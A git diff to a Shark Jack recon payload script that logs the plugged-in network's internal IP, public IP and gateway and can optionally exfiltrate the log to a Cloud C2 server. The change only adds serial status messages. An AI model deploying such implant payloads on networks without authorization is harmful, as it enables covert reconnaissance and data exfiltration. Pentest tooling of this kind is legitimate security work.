diff --git a/payloads/library/recon/ipinfo/payload.sh b/payloads/library/recon/ipinfo/payload.sh index 0aebcf0..819067a 100644 --- a/payloads/library/recon/ipinfo/payload.sh +++ b/payloads/library/recon/ipinfo/payload.sh @@ -14,11 +14,12 @@ # LED SPECIAL (Cyan Blink)... Exfiltrating log to Cloud C2 # LED FINISH (Green Fast Blink to Solid)... Payload successful +SERIAL_WRITE [*] Setting up payload CLOUDC2=0 LOOT_DIR=/root/loot/ipinfo PUBLIC_IP_URL="http://ipinfo.io/ip" -function FAIL() { LED FAIL; exit; } +function FAIL() { LED FAIL; SERIAL_WRITE [!] Failed to obtain IP address;exit; } LED SETUP # Make log file @@ -30,7 +31,7 @@ LOG="$LOOT_DIR/$LOG_FILE" NETMODE DHCP_CLIENT # Wait until Shark Jack has an IP address -while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done +while ! ifconfig eth0 | grep "inet addr"; do sleep 1; SERIAL_WRITE ...waiting for IP address; done LED ATTACK # Gather IP info and save log @@ -42,12 +43,17 @@ Internal IP Address: $INTERNALIP\n\ Public IP Address: $PUBLICIP\n\ Gateway: $GATEWAY\n" >> $LOG +SERIAL_WRITE [*] Internal IP: $INTERNALIP +SERIAL_WRITE [*] Public IP: $PUBLICIP +SERIAL_WRITE [*] Gateway: $GATEWAY + # Optionally connect to Cloud C2, wait for connection and exfiltrate loot if [ "$CLOUDC2" = "1" ]; then + SERIAL_WRITE [*] Sending results to Cloud C2 LED SPECIAL C2CONNECT while ! pgrep cc-client; do sleep 1; done C2EXFIL STRING $LOG IPinfo fi -LED FINISH \ No newline at end of file +LED FINISH